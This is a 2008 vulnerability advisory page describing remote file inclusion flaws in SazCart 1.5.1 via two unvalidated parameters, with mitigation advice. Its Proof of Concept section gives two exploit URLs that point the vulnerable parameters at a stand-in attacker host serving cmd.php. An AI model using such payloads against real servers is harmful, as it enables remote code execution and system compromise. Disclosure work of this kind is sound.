GFI LANguard - Vulnerability scanning and patch management. Download a free trial!

Main Menu

Free Services

Critical Alerts

- 28 May 2008

Adobe Flash Player Unspecified Remote Code Execution Vulnerability

 

- 11 Mar 2008

Microsoft Excel Multiple Remote Code Execution Vulnerabilities

 

- 16 Jan 2008

Microsoft Excel File Handling Remote Arbitrary Code Execution Vulnerability

 

- 13 Dec 2007

JustSystems Ichitaro "JSGCI.DLL" Document Processing Remote Buffer Overflow Vulnerability

 

- 11 Dec 2007

Microsoft Internet Explorer Multiple Remote Memory Corruption Vulnerabilities

 

Advisories » SazCart Multiple Parameter Handling Remote File Inclusion Vulnerabilities

 

Release Date: 09/05/2008 Severity: Highly Critical Highly Critical
SecWatch Advisory: SWID1021136 Cause: Input validation error
Solution Status: Unpatched Impact: Disclosure of system information
Execution of arbitrary code
Exploit Status: PoC Available Access Vector: From remote
 
Affected Software: SazCart 1.x
 
References: http://milw0rm.com/exploits/5566
Secunia: SA30148
Bugtraq ID: BID#29113

 

Description:

Multiple input validation vulnerabilities in SazCart have been reported, which can be exploited by remote users to disclose sensitive information and compromise a vulnerable system.

User-supplied input passed to the "_saz[settings][site_dir]" parameter in layouts/default/header.saz.php and to the "_saz[settings][site_url]" parameter in admin/alayouts/default/pages/login.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from external and local resources, such as arbitrary PHP code which will be executed by the target web service. The PHP code, including operating system commands, will run with the privileges of the target web service.

Note: Successful exploitation requires "register_globals" is enabled.

 

Affected:

SazCart version 1.5.1. Other versions may also be affected.

 

Proof of Concept:

Arbitrary File Inclusion:
http://[target]/layouts/default/header.saz.php?_saz[settings][site_dir]=http://[attacker]/cmd.php
http://[target]/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=http://[attacker]/cmd.php

 

Solution:

There was no vendor-supplied solution at the time of entry.

Edit source code manually to ensure user-supplied input is correctly sanitised.

Filter malicious characters and character sequences via a HTTP proxy or firewall with URL filtering capabilities.

 

Credits:

RoMaNcYxHaCkEr

 

Free Vulnerability Notification Service

Receive free instant and customisable notifications of new vulnerabilities or exploits via e-mail, web or RSS feeds. Click here for more information.

 

Related Vulnerabilities and Exploits

06 Nov 06: SazCart "_saz[settings][shippingfolder]" Parameter Handling Remot..